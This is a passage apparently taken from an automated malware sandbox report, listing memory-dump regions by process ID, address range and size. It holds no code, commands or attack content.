                                                                                                                                                        • memory/2788-347-0x0000017B65840000-0x0000017B658B4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          464KB

                                                                                                                                                        • memory/2804-364-0x000001BA8A640000-0x000001BA8A6B4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          464KB

                                                                                                                                                        • memory/2840-600-0x0000000000E30000-0x0000000000E31000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/2948-180-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2956-148-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/2956-117-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/2956-132-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          572KB

                                                                                                                                                        • memory/2956-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.5MB

                                                                                                                                                        • memory/2956-134-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          152KB

                                                                                                                                                        • memory/2956-135-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                        • memory/2956-146-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/2956-147-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/2956-149-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          100KB

                                                                                                                                                        • memory/3048-150-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3196-159-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3196-207-0x0000000001F40000-0x0000000001F49000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          36KB

                                                                                                                                                        • memory/3196-208-0x0000000000400000-0x000000000046B000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          428KB

                                                                                                                                                        • memory/3200-179-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3512-205-0x0000000001FC0000-0x000000000205D000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          628KB

                                                                                                                                                        • memory/3512-209-0x0000000000400000-0x00000000004C0000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          768KB

                                                                                                                                                        • memory/3512-160-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3712-114-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3764-168-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3764-222-0x000001F6872D0000-0x000001F68733F000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          444KB

                                                                                                                                                        • memory/3764-223-0x000001F687340000-0x000001F687410000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          832KB

                                                                                                                                                        • memory/3788-155-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3796-416-0x0000000005280000-0x0000000005886000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          6.0MB

                                                                                                                                                        • memory/3796-402-0x0000000000418826-mapping.dmp
                                                                                                                                                        • memory/3840-330-0x0000000000020000-0x0000000000021000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/3840-363-0x0000000004A70000-0x0000000004A71000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/3840-340-0x00000000047F0000-0x00000000047F1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/3840-302-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3860-152-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3936-153-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3964-226-0x000000001B2C0000-0x000000001B2C2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/3964-195-0x0000000000C10000-0x0000000000C57000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          284KB

                                                                                                                                                        • memory/3964-184-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/3964-187-0x0000000000490000-0x0000000000491000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/3984-409-0x0000000004CC0000-0x00000000052C6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          6.0MB

                                                                                                                                                        • memory/3984-395-0x0000000000418852-mapping.dmp
                                                                                                                                                        • memory/4000-325-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4000-354-0x0000000077CA0000-0x0000000077E2E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/4000-391-0x0000000000C70000-0x0000000000C71000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4024-162-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4024-178-0x000000001BA20000-0x000000001BA22000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4024-176-0x0000000001200000-0x0000000001216000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          88KB

                                                                                                                                                        • memory/4024-174-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4044-270-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          340KB

                                                                                                                                                        • memory/4044-263-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4092-177-0x000000001AF10000-0x000000001AF12000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4092-157-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4092-167-0x0000000000260000-0x0000000000261000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4104-265-0x00007FF6ADAD4060-mapping.dmp
                                                                                                                                                        • memory/4104-275-0x00000182E7170000-0x00000182E71E4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          464KB

                                                                                                                                                        • memory/4108-230-0x000000000A880000-0x000000000A881000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4108-211-0x0000000000B00000-0x0000000000B01000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4108-233-0x0000000005340000-0x0000000005341000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4108-188-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4108-227-0x000000000ACE0000-0x000000000ACE1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4108-220-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4108-224-0x00000000052B0000-0x00000000052BB000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          44KB

                                                                                                                                                        • memory/4136-358-0x0000000001670000-0x0000000001671000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4136-342-0x0000000000E20000-0x0000000000E21000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4136-323-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4144-352-0x0000000077CA0000-0x0000000077E2E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/4144-383-0x0000000006090000-0x0000000006091000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4144-297-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4144-349-0x0000000001120000-0x0000000001121000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-262-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-235-0x00000000074C0000-0x00000000074C1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-231-0x0000000007460000-0x0000000007461000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-212-0x0000000000690000-0x0000000000691000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-290-0x00000000076A0000-0x00000000076A1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-225-0x0000000002A20000-0x0000000002A53000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          204KB

                                                                                                                                                        • memory/4148-193-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4148-254-0x0000000007500000-0x0000000007501000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4148-229-0x0000000007A30000-0x0000000007A31000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4204-351-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4224-197-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4224-326-0x0000000004C70000-0x0000000004C71000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4224-221-0x0000000002380000-0x0000000002381000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4224-234-0x00000000023F0000-0x00000000023F1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4224-213-0x0000000000220000-0x0000000000221000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4224-232-0x0000000004520000-0x0000000004552000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          200KB

                                                                                                                                                        • memory/4224-228-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4252-200-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4288-203-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4324-206-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4444-217-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4540-514-0x00000000055E0000-0x0000000005BE6000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          6.0MB

                                                                                                                                                        • memory/4560-327-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4560-392-0x00000000001E0000-0x00000000001EA000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          40KB

                                                                                                                                                        • memory/4672-381-0x0000000005C10000-0x0000000005C11000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4672-301-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4672-367-0x0000000077CA0000-0x0000000077E2E000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.6MB

                                                                                                                                                        • memory/4684-328-0x00000000055C0000-0x00000000055C1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4684-296-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4684-305-0x0000000000B10000-0x0000000000B11000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4684-314-0x0000000005390000-0x0000000005391000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4684-321-0x0000000005430000-0x0000000005431000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4696-331-0x0000000000C80000-0x0000000000C81000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4696-360-0x000000001B2F0000-0x000000001B2F2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/4696-298-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4696-343-0x0000000000C90000-0x0000000000CB3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          140KB

                                                                                                                                                        • memory/4696-315-0x0000000000550000-0x0000000000551000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4696-350-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4708-236-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4708-261-0x000000000EA40000-0x000000000EA41000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4708-279-0x0000000002F10000-0x0000000002F11000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4772-411-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4804-277-0x0000000004970000-0x00000000049CF000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          380KB

                                                                                                                                                        • memory/4804-245-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4804-272-0x000000000486C000-0x000000000496D000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          1.0MB

                                                                                                                                                        • memory/4812-338-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4820-307-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/4948-584-0x00000000048A3000-0x00000000048A4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4948-569-0x00000000048A2000-0x00000000048A3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/4948-568-0x00000000048A0000-0x00000000048A1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5080-311-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5124-425-0x00000000070B2000-0x00000000070B3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5124-424-0x00000000070B0000-0x00000000070B1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5124-417-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5124-539-0x00000000070B3000-0x00000000070B4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5288-422-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5476-432-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5488-540-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5488-541-0x0000000006EB2000-0x0000000006EB3000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5488-567-0x0000000006EB3000-0x0000000006EB4000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5624-443-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5676-469-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          4KB

                                                                                                                                                        • memory/5676-449-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5728-451-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5852-461-0x0000000000000000-mapping.dmp
                                                                                                                                                        • memory/5884-465-0x0000000000000000-mapping.dmp